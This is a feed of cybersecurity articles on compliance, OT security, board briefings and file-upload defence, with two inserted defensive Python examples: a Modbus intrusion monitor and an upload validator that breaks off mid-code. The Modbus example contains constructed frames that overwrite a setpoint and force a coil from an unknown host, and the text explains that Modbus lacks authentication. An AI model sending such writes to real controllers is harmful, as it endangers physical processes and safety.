Cybersecurity – INDIA NEWS (http://www.indiavpn.org)

CISO Perspectives on Complying with Cybersecurity Regulations
Fri, 05 Apr 2024 12:29:42 +0000
http://www.indiavpn.org/2024/04/05/ciso-perspectives-on-complying-with-cybersecurity-regulations/

Compliance requirements are meant to increase cybersecurity transparency and accountability. As cyber threats increase, so do the number of compliance frameworks and the specificity of the security controls, policies, and activities they include.

For CISOs and their teams, that means compliance is a time-consuming, high-stakes process that demands strong organizational and communication skills on top of security expertise.

We tapped into the CISO brain trust to get their take on the best ways to approach data security and privacy compliance requirements. In this blog, they share strategies to reduce the pain of dealing with the compliance process, including risk management and stakeholder alignment.

Read on for recommendations for turning compliance from a “necessary evil” into a strategic tool that helps you evaluate cyber risk, gain budget and buy-in, and increase customer and shareholder confidence.

Which CISOs care most about compliance?

How CISOs view cybersecurity compliance can vary greatly, depending on their company size, geography, sector, data sensitivity, and program maturity level. For example, if you’re a publicly traded company in the United States, you’ll have no choice but to comply with multiple regulations, as well as maintain risk assessments and corrective action plans.

If you’re a government agency or sell to one, you’ll have specific public-sector compliance requirements to meet. Banks, healthcare organizations, critical infrastructure operators, eCommerce companies, and other enterprises have industry-specific compliance rules to follow.

Security does not equal compliance.

Even if you don’t fall into one of these categories, there are many reasons you’ll need to demonstrate security best practices, such as obtaining a SOC 2 report or applying for cyber insurance. For all organizations, broad cybersecurity frameworks like NIST CSF and ISO/IEC 27001 provide models to follow and structures for communicating results.

That said, “security does not equal compliance” is a mantra often heard among CISOs. Certainly, just because you’re compliant, that doesn’t mean you’re secure. Highly mature cybersecurity organizations may consider compliance the bare minimum and go well beyond the required components to protect their organizations.

Compliance as a business enabler

While a CISO can recommend cybersecurity investments and practices to meet compliance requirements, they aren’t the ultimate decision-maker. Therefore, a key responsibility of a CISO is communicating the risk of non-compliance and working with other company leaders to decide which initiatives to prioritize. Risk, in this context, incorporates not just technical risk, but also business risk.

Steve Zalewski, former CISO of Levi Strauss, likes to use the “carrot and stick” metaphor. “Audit and compliance historically have been the stick that makes you have to do something,” he shares on the Defense-in-Depth podcast, “but making [you] do it doesn’t mean that the business is aligned to the value of doing it.” To avoid friction, he recommends showing people the business value of compliant cybersecurity. “There has to be a carrot component to make them feel like they have a choice in the matter,” he says.


Let’s say an organization isn’t fully meeting a security best practice for privilege management. While non-compliance could result in regulatory fines and shareholder lawsuits, the underlying security gaps could cause an even greater impact on the business, including downtime, ransomware payments, and revenue loss. Meeting compliance requirements, on the other hand, could deliver business value, such as faster sales, stronger partnerships, or lower cyber insurance rates.

As part of a comprehensive risk management program, boards and executive leadership must weigh the costs and benefits of ensuring compliance with the potential costs of non-compliance. In some cases, they may decide that a certain level of risk is acceptable and choose not to implement additional safeguards. In other cases, they may double down.

How CISOs use compliance frameworks to plan their cybersecurity roadmap

Some CISOs use compliance frameworks as a methodology for techniques and processes to incorporate in their cybersecurity program. Essentially, they inform program priorities and create a shopping list for must-have solutions that align with the program they’re trying to build.

On the Audience First podcast, Brian Haugli, a former Fortune 500 CISO, draws a distinction between being compliance-dependent and using compliance frameworks to guide informed risk management:

“We can’t be black and white. We have to be able to make risk-based decisions, to say, ‘I will accept this risk because I can’t afford to close it right now. But I will do these things to mitigate risk to a low enough level that allows me to accept them.’”

CISOs need partners in compliance

CISOs aren’t in the compliance boat alone. They must build partnerships with legal teams, privacy officers, and audit or risk committees to understand changing compliance requirements and decide how to address them.

Sometimes these internal partners require security teams to implement stronger controls, but they can also put on the brakes. As one CISO of a fast-growing technology vendor told us, “Frankly, Legal outweighs me every day of the week. They tell me what I can and can’t do. I would love to be able to monitor everyone’s behavior, but privacy laws say I can’t do that.”

Compliance teams do many things that security engineers and analysts don’t have the time or resources to do. They hold security accountable, double-checking that the controls are working as expected. They act as intermediaries between security teams, regulators, and auditors to demonstrate compliance, whether that means collecting evidence through manual security questionnaires or via technology integrations.

For example, for a public sector certification, security controls must be monitored and logged, and at least six months of that log data retained, so the organization can evidence that the controls have operated as claimed.

Tools and resources that support compliance

Risk registers are helpful in aligning all stakeholders by documenting all risks and organizing them by priority. With everyone looking at the same information, you can agree on appropriate actions. As part of a risk management program, policies, standards, and procedures are regularly reviewed, and any changes approved before implementation.

Using tools like GRC systems and continuous compliance monitoring, organizations can track ongoing security activities and report results. GRC systems can connect to SIEMs to collect logs and to vulnerability scanners to show that scheduled checks were completed. “Instead of shuffling spreadsheets around, we’ve built various connectors that integrate with our GRC platform to evidence that we are in compliance,” explains the tech CISO. “They map across certifications in a single pane of glass, so when an auditor comes in, we show them a screen that says, ‘Here’s the evidence.’”

In addition to tooling, many companies rely on third parties to conduct compliance assessments. They may perform an internal compliance audit before an external one to make sure there are no surprises if regulators come calling.

Comply once, apply to many

Most organizations have numerous compliance bodies they must answer to, as well as cyber insurance providers, customers, and partners. While compliance can be a burden, the good news is that there are techniques to streamline the assessment process. “If you look across all the major compliance bodies, about 80% of the requirements are the same,” says the CISO of a SaaS provider. “You can align with a framework like NIST and apply the same practices across them all.”

For example, Privileged Access Management (PAM) requirements like password management, Multi-Factor Authentication (MFA), and Role-Based Access Controls are common across compliance frameworks. You can dig into the specifics to see how PAM shows up in a variety of compliance requirements on Delinea.com.

Emerging compliance requirements

Compliance is a fluid space with requirements that evolve to address changing risk patterns and business conditions. CISOs are looking to compliance bodies for guidance on managing emerging cyber risks, such as Artificial Intelligence.

Moving forward, CISOs expect that ensuring compliance will become an even greater part of their job. As the industry faces ever-growing threats, compliance is a key part of a strategic and comprehensive approach to cybersecurity risk management.

For more on this topic, check out Delinea’s 401 Access Denied podcast episode: Securing Compliance: Expert Insights with Steven Ursillo

Need a step-by-step guide for planning your strategic journey to privileged access security?

Start with a free, customizable PAM Checklist.




Considerations for Operational Technology Cybersecurity
Thu, 04 Apr 2024 12:00:01 +0000
http://www.indiavpn.org/2024/04/04/considerations-for-operational-technology-cybersecurity/

Operational Technology (OT) refers to the hardware and software used to change, monitor, or control the enterprise’s physical devices, processes, and events. Unlike traditional Information Technology (IT) systems, OT systems directly impact the physical world. This unique characteristic of OT brings additional cybersecurity considerations not typically present in conventional IT security architectures.

The convergence of IT and OT

Historically, IT and Operational Technology (OT) have operated in separate silos, each with its own set of protocols, standards, and cybersecurity measures. However, these two domains are increasingly converging with the advent of the Industrial Internet of Things (IIoT). While beneficial in terms of increased efficiency and data-driven decision-making, this convergence also exposes OT systems to the same cyber threats that IT systems face.

Unique Cybersecurity Considerations for OT

Real-time requirements

Operational Technology systems often operate in real time and cannot tolerate delays. A delay in an OT system could lead to significant operational issues or even safety hazards. Therefore, cybersecurity measures that introduce latency, such as multi-factor authentication, just-in-time access request workflows, and session activity monitoring, may be unsuitable on the control path itself and may need to be applied at the jump host or engineering workstation that fronts the controller rather than on the controller.

Note that the latency these controls add varies with the specific Privileged Access Management (PAM) solution and how it is configured. It is therefore crucial to test any PAM solution under realistic real-time conditions to confirm it meets performance requirements while still providing the necessary security controls.

Legacy systems and connectivity

Many Operational Technology systems are long in the tooth. They’re proprietary and customized for longevity and resilience under harsh conditions. Cybersecurity was not a high-priority consideration when legacy OT systems were designed, so they lack resilience against contemporary threats, resulting in high risk.

They may lack basic security capabilities such as encryption, authentication, and Multi-Factor Authentication (MFA). Modernizing these systems presents significant challenges in terms of cost, operational disruption, and compatibility. The people who understood the original design and code may no longer be available, so nobody on staff may be able to assess what a change would do.

With the increasing integration of these systems into IT networks and, occasionally, the internet, their susceptibility to cyber threats is amplified. While beneficial for operational efficiency, this connectivity inadvertently expands their attack surface, thereby escalating their vulnerability.

Some examples of unique security challenges include:

  • Outdated Hardware and Software: Obsolete hardware and software introduce significant security challenges due mainly to incompatibility with modern off-the-shelf security solutions and best practices. This exposes legacy OT systems to unauthorized surveillance, data breaches, ransomware attacks, and potential manipulation.
  • Lack of Encryption: Encryption is crucial for safeguarding sensitive data and communications. Nonetheless, older OT systems might not have the capability to support encryption, which exposes them to attacks that could jeopardize the confidentiality and integrity of data.
  • Insecure Communication Protocols: Legacy OT systems may use communication protocols that attackers can exploit. For example, Modbus, a widely used protocol in legacy OT systems (Modbus/TCP on port 502), has no authentication and no encryption, so any host that can reach the controller on the network can read and write its registers and coils.
  • Limited Ability to Implement Cybersecurity Controls: Traditional OT systems frequently have a restricted capacity to apply cybersecurity measures. For example, they may have been delivered before cybersecurity was a recognized requirement, and they are often maintained by the OEM rather than the operator, which limits what the operator is permitted to change.
  • Third-Party Remote Connections: Older OT systems might support remote connections from third parties to manage OT devices on an internal network. Attackers can compromise the vendor’s remote access path and pivot from it to other devices.
  • Lack of Security Awareness: Operators and technicians who manage legacy OT systems may lack security awareness and training, making them vulnerable to social engineering attacks.
  • Embedded or Easy-to-Guess Credentials: Some OT and IoT devices ship with hard-coded or easily guessed default passwords, along with other design shortcomings.
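The Modbus point above is worth seeing concretely. Because the protocol carries no credentials, the only signal that separates a legitimate write from an attacker’s write is where it came from, so the practical compensating control is passive monitoring of the network segment: parse each Modbus/TCP frame, and alert on write function codes from any host that is not on the short list allowed to write. A monitor like this sits off a SPAN port or tap and adds no latency to the control loop, which matters given the real-time constraint discussed earlier. The following is an added example written for this page, not code from the original article or from any vendor it mentions. The source addresses, the allowlist, and the five sample frames are constructed for illustration; the frame layout (7-byte MBAP header followed by the PDU) and the function code numbers follow the Modbus Application Protocol specification.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Modbus function codes (Modbus Application Protocol specification)
FC_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs",
    3: "Read Holding Registers", 4: "Read Input Registers",
    5: "Write Single Coil", 6: "Write Single Register",
    15: "Write Multiple Coils", 16: "Write Multiple Registers",
    23: "Read/Write Multiple Registers",
}
WRITE_FCS = {5, 6, 15, 16, 23}  # codes that change process state


@dataclass
class ModbusFrame:
    transaction_id: int
    unit_id: int
    function_code: int
    data: bytes


def parse_modbus_tcp(frame: bytes) -> ModbusFrame:
    """Parse one Modbus/TCP ADU: 7-byte MBAP header followed by the PDU.
    Raises ValueError on structurally invalid frames."""
    if len(frame) < 8:
        raise ValueError("frame shorter than MBAP header + function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0:
        raise ValueError(f"protocol id {proto} is not Modbus (0)")
    # The length field counts the unit id plus the PDU, i.e. every byte
    # after the first six, so it must agree with what was actually received.
    if length != len(frame) - 6:
        raise ValueError(f"length field {length} does not match payload {len(frame) - 6}")
    return ModbusFrame(tid, unit, frame[7], frame[8:])


def describe_write(f: ModbusFrame) -> str:
    """Human-readable target of a write request, used in the alert text."""
    if f.function_code in (5, 6) and len(f.data) >= 4:
        addr, value = struct.unpack(">HH", f.data[:4])
        return f"address {addr} value 0x{value:04X}"
    if f.function_code in (15, 16) and len(f.data) >= 4:
        addr, qty = struct.unpack(">HH", f.data[:4])
        return f"{qty} item(s) from address {addr}"
    return "unparsed payload"


def check_frame(src_ip: str, frame: bytes, write_allowlist: set) -> Optional[str]:
    """Return an alert string if the frame is malformed or is a write from a
    host not permitted to write; None if the frame is acceptable."""
    try:
        f = parse_modbus_tcp(frame)
    except ValueError as e:
        return f"MALFORMED from {src_ip}: {e}"
    name = FC_NAMES.get(f.function_code, f"FC {f.function_code}")
    if f.function_code in WRITE_FCS and src_ip not in write_allowlist:
        return f"UNAUTHORIZED WRITE from {src_ip}: unit {f.unit_id} {name} ({describe_write(f)})"
    return None


def build_request(tid: int, unit: int, fc: int, data: bytes) -> bytes:
    """Encode a Modbus/TCP request; used here only to construct sample traffic."""
    pdu = bytes([fc]) + data
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed sample traffic (source IP, raw frame). Not a real capture;
# the addresses and the allowlist are assumptions for this example.
WRITE_ALLOWLIST = {"10.10.1.5"}  # the HMI that is allowed to issue writes
SAMPLE_TRAFFIC = [
    ("10.10.1.5", build_request(1, 1, 3, struct.pack(">HH", 0, 10))),       # HMI polls 10 holding registers
    ("10.10.1.5", build_request(2, 1, 6, struct.pack(">HH", 40, 1500))),    # HMI sets a setpoint
    ("10.10.9.77", build_request(3, 1, 6, struct.pack(">HH", 40, 9999))),   # unknown host overwrites it
    ("10.10.9.77", build_request(4, 1, 5, struct.pack(">HH", 7, 0xFF00))),  # unknown host forces a coil on
    ("10.10.9.77", b"\x00\x05\x00\x00\x00\x05\x01\x03"),                    # length field does not match
]


def scan(traffic=SAMPLE_TRAFFIC, allowlist=WRITE_ALLOWLIST) -> list:
    """Run the check over every frame and return the alerts in order."""
    return [a for src, frame in traffic if (a := check_frame(src, frame, allowlist))]


if __name__ == "__main__":
    for alert in scan():
        print(alert)
```

Run against the constructed traffic, the two frames from the HMI pass, the two writes from 10.10.9.77 are flagged with the register and coil they target, and the frame with a bad length field is reported as malformed. In a real deployment the allowlist would be derived from the plant’s asset inventory, and the alerts would feed the SIEM rather than stdout; the parser deliberately does not touch the traffic, so a false positive costs an analyst’s time rather than a process upset.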

Safety and reliability

In Operational Technology environments, the primary focus is maintaining the safety and reliability of the physical processes they control. This is a significant departure from traditional IT environments, where the focus is often on the confidentiality and integrity of data.

  • Safety: OT systems control physical processes that can have real-world consequences if they malfunction. For example, in a power plant, a failure in the control system could lead to a shutdown or even a catastrophic event. Therefore, ensuring the safety of these systems is paramount.
  • Reliability: OT systems must be available and function correctly to ensure the smooth operation of physical processes. Any downtime can lead to significant operational disruptions and financial losses.

By comparison, confidentiality (preventing unauthorized access to information) and integrity (ensuring that data remains accurate and unaltered) often take a back seat in OT environments. While these elements are significant, they usually don’t carry as much weight as safety and reliability.

This order of priority can affect the implementation of cybersecurity measures. A cybersecurity action that safeguards data (boosting confidentiality and integrity) but jeopardizes the dependability of an OT system might not be deemed suitable. For instance, a security patch could rectify a known vulnerability (improving integrity), but you might consider it unsuitable if it results in system instability (undermining reliability).

While many cybersecurity best practices and frameworks focus on traditional IT environments, OT can also benefit. For example, OWASP Top 10 addresses web application cybersecurity concerns such as injection, broken authentication, sensitive data exposure, and security misconfigurations, which are common vulnerabilities that can also be found in OT environments. OWASP also has a separate list for the Internet of Things (IoT), which is often a significant component of OT environments.


Thus, cybersecurity strategies in OT environments need to be carefully designed to balance the need for safety and reliability with the need for data confidentiality and integrity. This often requires a different approach than traditional IT security, focusing more on minimizing disruptions to physical processes. It’s a delicate balancing act that requires deep knowledge of operational processes and potential cyber threats.

Securing OT environments requires a different approach compared to traditional information technology security. It requires understanding OT systems’ unique characteristics and requirements, as well as designing cybersecurity measures that can protect them without compromising their operation.

As IT and OT continue to converge, the importance of OT cybersecurity will only increase. The gaps described above, in particular the lack of encryption and authentication in older systems, will not close on their own, so the exposure grows with every new connection into the OT network unless compensating controls are put in place.

What does cybersecurity like this cost? Not as much as you think. Get a quote for the easiest-to-use enterprise-grade PAM solution available both in the cloud and on-premise.




Crafting and Communicating Your Cybersecurity Strategy for Board Buy-In
Tue, 19 Mar 2024 11:14:09 +0000
http://www.indiavpn.org/2024/03/19/crafting-and-communicating-your-cybersecurity-strategy-for-board-buy-in/

In an era where digital transformation drives business across sectors, cybersecurity has transcended its traditional operational role to become a cornerstone of corporate strategy and risk management. This evolution demands a shift in how cybersecurity leaders—particularly Chief Information Security Officers (CISOs)—articulate the value and urgency of cybersecurity investments to their boards.

The Strategic Importance of Cybersecurity

Cybersecurity is no longer a backroom IT concern but a pivotal agenda item in boardroom discussions. The surge in cyber threats, coupled with their capacity to disrupt business operations, erode customer trust, and incur significant financial losses, underscores the strategic value of robust cybersecurity measures. Moreover, as companies increasingly integrate digital technologies into their core operations, the significance of cybersecurity in safeguarding corporate assets and reputation continues to rise.

The Current State of Cybersecurity in Corporate Governance

Despite its strategic importance, however, there remains a significant gap in most boardrooms’ understanding and management of cybersecurity risks. This gap stems from several challenges: the intricate nature of cybersecurity, the swift evolution of cyber threats, and a widespread lack of specialized expertise among board members. For example, among major US corporations, 51% of Fortune 100 companies have at least one director with a background in information security, while this figure drops to only 17% for S&P 500 companies and to just 9% for companies in the Russell 3000 Index, a significant variation in board-level cybersecurity expertise across company sizes.

Are you ready to bridge the expertise gap in your cybersecurity strategy? ArmorPoint offers tailored executive insights that empower you to convey the critical importance of robust cybersecurity measures to your board with confidence. Explore their virtual Chief Information Security Officer (vCISO) services today.

The regulatory landscape adds another layer of complexity, increasing the liability for C-suite executives and board members who are now expected to have a grasp on cybersecurity’s impact on the organization. Recent legislative developments underscore the need for enhanced transparency and accountability in how companies manage their cyber risks:

  • SEC’s Cyber Disclosure Rules (2023): In July 2023, the SEC adopted rules requiring public companies to disclose material cybersecurity incidents on Form 8-K within four business days of determining that an incident is material, and to describe annually how they identify, assess, and manage cybersecurity risk, including the board’s oversight role. The aim is to give investors and other stakeholders a clearer picture of how companies identify, evaluate, and address their cybersecurity exposure.
  • Cyber Incident Reporting for Critical Infrastructure Act (2022): Enacted by Congress in March 2022, CIRCIA requires covered entities in critical infrastructure sectors to report covered cyber incidents to CISA within 72 hours and ransom payments within 24 hours, once CISA’s implementing rule takes effect. It reflects the government’s intent to strengthen national cybersecurity resilience by prompting faster responses to cyber threats and creating a shared picture of incidents across sectors.

These regulatory changes are part of a broader push by regulators and the government to ensure that companies like yours take cybersecurity seriously—not just as a technical issue, but as a critical component of the overall business strategy. By mandating more detailed disclosures and faster incident reporting, these initiatives aim to create a more informed and secure digital ecosystem for businesses and their stakeholders. For C-suite executives and board members, staying ahead of these regulations and integrating their requirements into your company’s cybersecurity strategy is now an indispensable part of the job, emphasizing the need for a strategic, informed approach to cybersecurity governance.

Understanding the Board’s Perspective

Effective communication with the board about cybersecurity necessitates a strategic shift in the conversation away from the granular technical details and towards the broader implications for the company’s strategic goals. Boards traditionally focus on financial performance, regulatory compliance, and risk management, areas deeply affected by cybersecurity incidents. Yet, the intricacy of cybersecurity can obscure its relevance to these priorities, making it challenging for board members to grasp its full strategic significance. By reframing technical cybersecurity issues into business-centric discussions, you highlight not just the financial and regulatory risks but also position a robust cybersecurity posture as a strategic asset that safeguards and elevates the company’s value.

The key lies in steering the board away from “wrong” questions that limit the scope of cybersecurity discussions to tactical or superficial levels. Such questions often include:

  • “How much cybersecurity is enough?”
  • “What tools do we need to buy?”
  • “Are we compliant with the latest cybersecurity regulations?”
  • “Can we guarantee we won’t be hacked?”
  • “How does our cybersecurity spending compare to our competitors?”

Instead, encouraging the board to ask strategic questions like, “What resources do we need to feel comfortable with our level of risk?” transforms the dialogue. This shift promotes a deeper understanding of cybersecurity’s role in supporting the organization’s overarching strategic objectives and managing risk effectively.

Addressing Your Board’s Key Cybersecurity Concerns

When briefing your board on cybersecurity, it’s crucial to focus on their key concerns and priorities within the cybersecurity domain. Some of these key concerns include:

Financial Impact of Cyber Incidents

Boards are particularly concerned about the financial impact of cyber incidents, which can include direct costs such as ransom payments and recovery expenses, as well as indirect costs like reputational damage and loss of customer trust. To address this concern, CISOs should present a clear analysis of potential financial risks associated with various cyber threats and demonstrate how strategic cybersecurity investments can mitigate these risks. This includes showing cost-benefit analyses of proposed cybersecurity measures and highlighting case studies where robust cybersecurity defenses have led to minimized financial impacts.

Regulatory Compliance and Legal Liabilities

With the increasing number of data protection regulations globally, boards are concerned about compliance and the legal liabilities of failing to protect sensitive customer and company data. CISOs need to outline the current regulatory landscape relevant to their organization and explain how the cybersecurity strategy aligns with compliance requirements. This discussion should include the potential legal and financial repercussions of non-compliance and how your company’s cybersecurity measures are designed to prevent such outcomes.

Protection of Intellectual Property and Sensitive Data

The theft or exposure of intellectual property and sensitive data can have long-term detrimental effects on a company’s competitive position and market value. Boards want assurance that these assets are adequately protected. CISOs should discuss the specific measures in place to safeguard intellectual property and sensitive information, including data encryption, access controls, and monitoring systems. Additionally, explaining the incident response plan in the event of a data breach can provide your board with confidence in your company’s preparedness to protect its most valuable assets.

Resilience to Advanced Persistent Threats (APTs)

Advanced Persistent Threats (APTs) represent sophisticated, targeted attacks that can evade detection for extended periods, posing significant risks to organizations. Boards are interested in understanding how the company is positioned to detect and respond to such threats. CISOs should explain the organization’s threat intelligence and monitoring capabilities, detailing how APTs are identified and neutralized. Discussing partnerships with external cybersecurity experts and agencies can also demonstrate a proactive and comprehensive approach to tackling these high-level threats.

Cloud Security and Third-party Risk Management

As companies increasingly adopt cloud services and rely on third-party vendors, boards are concerned about the associated security risks. CISOs must address how the organization manages cloud security and third-party risks, including the vetting process for vendors, the implementation of cloud security best practices, and the continuous monitoring of third-party services. Providing examples of contractual safeguards and collaborative security measures with vendors can help reassure your board of your company’s capability to manage these risks effectively.

Adoption of Artificial Intelligence (AI)

As Artificial Intelligence (AI) becomes integral to cybersecurity strategies, board members express concerns about its complexities and potential vulnerabilities. CISOs are tasked with clarifying how AI is deployed to strengthen security defenses, manage AI-specific risks, and ensure adherence to ethical standards and compliance regulations. Illustrating the proactive measures taken to monitor and mitigate AI-related threats, alongside examples of AI-driven success stories in detecting and neutralizing cyberattacks, can effectively convey the organization’s preparedness and strategic advantage in utilizing AI technology.

Leverage ArmorPoint’s vCISO expertise to directly address your board’s top cybersecurity concerns. Discover transformative insights and strategies that ensure your cybersecurity measures resonate at the highest level.

Six Tips to Prepare to Brief Your Boardroom

Effective communication with your board about cybersecurity involves more than presenting facts; it requires a strategic approach that aligns cybersecurity initiatives with their priorities. This means demonstrating the financial, operational, and reputational benefits of investing in cybersecurity, making the case for cybersecurity as an integral part of your company’s risk management strategy. By articulating the value of cybersecurity in terms that resonate with your board, CISOs can foster a more productive dialogue about how to best protect the organization.

Keep these six tips in mind as you prepare your presentation for your board.

Communicating the Need for the Cybersecurity Program to the Board:

1. Speak the Language of the Board:

  • Perform a Business Impact Analysis and translate technical cybersecurity risks into business terms that resonate with the board, such as financial impact, regulatory compliance, and reputational damage.

2. Quantify Risks and Impacts:

  • Use data and metrics from a risk assessment to quantify cybersecurity risks and the potential impacts on the organization.
  • Present cost-benefit analyses and return on investment (ROI) projections to demonstrate the value of investing in cybersecurity measures.

3. Align with Business Objectives:

  • Emphasize how the cybersecurity program aligns with the organization’s strategic objectives and contributes to long-term growth and sustainability.
  • Highlight the role of cybersecurity in enabling digital transformation, enhancing customer trust, and protecting brand reputation.

4. Provide Context and Benchmarks:

  • Provide context by comparing the organization’s cybersecurity posture with industry peers and benchmarks.
  • Highlight areas where the organization may be lagging behind or where investments are needed to meet industry standards and regulatory requirements.

5. Foster Ongoing Dialogue and Collaboration:

  • Foster an ongoing dialogue with the board about cybersecurity risks, trends, and mitigation strategies.
  • Solicit input and feedback from the board to ensure that cybersecurity initiatives are aligned with their risk tolerance level and strategic priorities.

6. Demonstrate Accountability and Compliance:

  • Emphasize the importance of cybersecurity as a corporate governance issue and demonstrate the organization’s commitment to accountability and compliance with regulatory requirements.
  • Provide regular updates to the board on cybersecurity initiatives, progress, and key performance indicators (KPIs).

Conclusion

As digital threats continue to evolve, the role of cybersecurity within corporate governance becomes increasingly critical. By effectively communicating the strategic importance of cybersecurity investments, cybersecurity leaders like you can ensure that your Board of Directors understands the vital role these measures play in safeguarding your company’s future. Through informed, strategic conversations, organizations can better navigate the complex landscape of cyber risks, aligning cybersecurity efforts with business objectives to achieve greater resilience and security.

For more information about how you can effectively communicate the value of cybersecurity to your board of directors, explore ArmorPoint’s vCISO services today.


Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Twitter and LinkedIn to read more exclusive content we post.



Demystifying a Common Cybersecurity Myth (http://www.indiavpn.org/2024/03/13/demystifying-a-common-cybersecurity-myth/, published Wed, 13 Mar 2024 16:34:31 +0000)

Mar 13, 2024 | The Hacker News | App Security / Cyber Security

Demystifying a Common Cybersecurity Myth

One of the most common misconceptions in file upload security is that certain tools are “enough” on their own. They are not. In our latest whitepaper, OPSWAT CEO and Founder Benny Czarny takes a comprehensive look at what it takes to prevent malware threats in today’s evolving file upload security landscape, and a big part of that is understanding where the pitfalls are and how to avoid them.

The first step in that process is understanding that three commonly used tools or solutions are not enough on their own. Let’s explore this concept and take a closer look at a better solution.

Understanding the Challenge

Modern web applications are complex: internet-connected IT systems interface with critical OT systems and rely on a wide range of cloud providers and protocols. These systems transfer and store highly sensitive and valuable data across government, healthcare, power, financial, and other critical sectors the world over, and a single malicious upload that crosses one of those boundaries can cause severe damage.

Securing file uploads to detect and prevent malware infiltration is critical. As this threat vector grows and the attack surface spreads, ensuring that these sectors remain secure becomes of the utmost importance. This is why building—and enforcing—a reliable and proven security strategy is paramount moving forward.

Tools of the Trade

One tool on its own is simply not enough. Here are three commonly used tools that, when used on their own to secure file uploads, do not offer adequate protection and why that is the case:

1. Anti-Malware File Scanning

Everyone is familiar with anti-malware, but not all anti-malware engines, or scanning modes, are created equal. There is still widespread confusion over efficacy rates: the “always-on” real-time protection that monitors an entire running system behaves very differently from static scanning of a file at rest, which is what an upload pipeline actually performs and which is typically run manually or on a schedule. Real-time scanning can exhibit nearly 100% efficacy rates, while static scanning is noticeably lower, with rates that range between 6% and 76%. To avoid a false sense of security, organizations must know exactly what they are getting with each deployment mode.

2. Web Application Firewalls

Many organizations assume that installing a web application firewall (WAF) protects them against malicious file uploads. That is very much not the case. A WAF primarily protects against attacks at the application layer (OSI Layer 7), such as injection and request tampering; it is not designed to prevent malware infections that target other layers or arrive through other channels, such as email attachments or removable media. A WAF can only inspect an upload if it terminates TLS in front of the application, and even then it typically relies on a single anti-malware engine, if any, for threat detection.

3. Sandboxing

Sandboxing is a technique originally used to analyze malware by isolating and executing suspicious files in a controlled environment to observe their behavior and detect signs of malicious activity. On its own, a sandbox is susceptible to advanced and time-based evasion techniques that obfuscate or delay malicious activity, and to environment-specific triggers in adaptive malware. Sandboxes are also resource-intensive, prone to both false positives and false negatives, and offer limited coverage of file-based malware.

Defense-in-Depth Cybersecurity

So, if you can’t rely on these methods alone, what is the answer? This is one of the spaces OPSWAT has spent the last 20 years innovating in. Our MetaDefender Platform layers in market-leading and globally trusted technologies to form an easy to deploy, integrated-by-design, defense-in-depth cybersecurity strategy for securing file uploads.

Multiscanning: Utilize over 30 of the world’s best antivirus engines to detect nearly 100% of threats

Multiscanning

As the effectiveness of single anti-malware solutions for static analysis varies anywhere from 6% to 76%, we decided to integrate multiple commercially available ones into our solution and benefit from their combined power. With more than 30 leading anti-malware engines working simultaneously, our efficacy rates are just shy of 100% while being optimized for speed.

Deep Content Disarm and Reconstruction: Sanitize, block, and remove file objects and regenerate a safe copy

Deep Content Disarm and Reconstruction (Deep CDR)

To further bolster our defenses, we pioneered a unique methodology referred to as Deep Content Disarm and Reconstruction (Deep CDR). Awarded an AAA, 100% Protection rating from SE Labs, our technology provides prevention-based security for file uploads by neutralizing potential threats before they can cause harm. It first evaluates and verifies the file type and its internal consistency and validates the file extension against the actual content to prevent masquerading, alerting the organization when a mismatch indicates an attack. It then separates the file into discrete components, removes potentially harmful objects, and rebuilds a usable file, reconstructing metadata and preserving the file’s characteristics.
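The type-and-extension consistency check described above, written out as an added example. This is not OPSWAT code and it does not perform content disarm or reconstruction; it only demonstrates the masquerading check that precedes it: the declared extension is compared with the file’s magic bytes, a .docx must actually be an OOXML package, and a PDF with active-content markers is refused. The allowlist, the size limit, the PDF marker list and the sample inputs are assumptions constructed for illustration.

```python
import io
import zipfile

# Allowlisted extensions and the magic-byte prefixes their content must start
# with. Assumption: this application accepts only these types.
SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
    "zip": (b"PK\x03\x04",),
    "docx": (b"PK\x03\x04",),
}
MAX_BYTES = 25 * 1024 * 1024  # assumed upload limit
# Crude active-content indicator for PDFs; a real deployment would parse the
# object tree instead of substring matching.
PDF_ACTIVE_MARKERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch")


def sniff_types(data):
    """Return the set of allowlisted types whose signature matches the content."""
    return {ext for ext, prefixes in SIGNATURES.items()
            if any(data.startswith(p) for p in prefixes)}


def _check_docx(data):
    """A .docx must be a ZIP container holding the OOXML parts Word expects."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = set(zf.namelist())
    except zipfile.BadZipFile:
        return False
    return {"[Content_Types].xml", "word/document.xml"} <= names


def validate_upload(filename, data):
    """Return (accepted, reason). Reject anything whose bytes disagree with the
    declared extension, which is how masqueraded files get through."""
    if len(data) > MAX_BYTES:
        return False, "file exceeds size limit"
    if "." not in filename:
        return False, "missing extension"
    ext = filename.rsplit(".", 1)[1].lower()
    if ext not in SIGNATURES:
        return False, f"extension .{ext} not allowed"
    sniffed = sniff_types(data)
    if not sniffed:
        return False, "content does not match any allowed type"
    if ext not in sniffed:
        return False, f"extension .{ext} but content looks like {sorted(sniffed)}"
    if ext == "docx" and not _check_docx(data):
        return False, "docx is not a valid OOXML package"
    if ext == "pdf" and any(marker in data for marker in PDF_ACTIVE_MARKERS):
        return False, "pdf contains active-content markers"
    return True, "ok"


def make_zip(entries):
    """Build an in-memory ZIP from {name: bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed sample inputs (not files from any real incident).
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
SAMPLE_PDF = b"%PDF-1.4\n1 0 obj << /Type /Catalog >> endobj\n%%EOF\n"
SAMPLE_PDF_JS = b"%PDF-1.4\n1 0 obj << /OpenAction 2 0 R /JavaScript 3 0 R >>\n%%EOF\n"
SAMPLE_DOCX = make_zip({"[Content_Types].xml": b"<Types/>",
                        "word/document.xml": b"<w:document/>"})
SAMPLE_PLAIN_ZIP = make_zip({"readme.txt": b"hello"})
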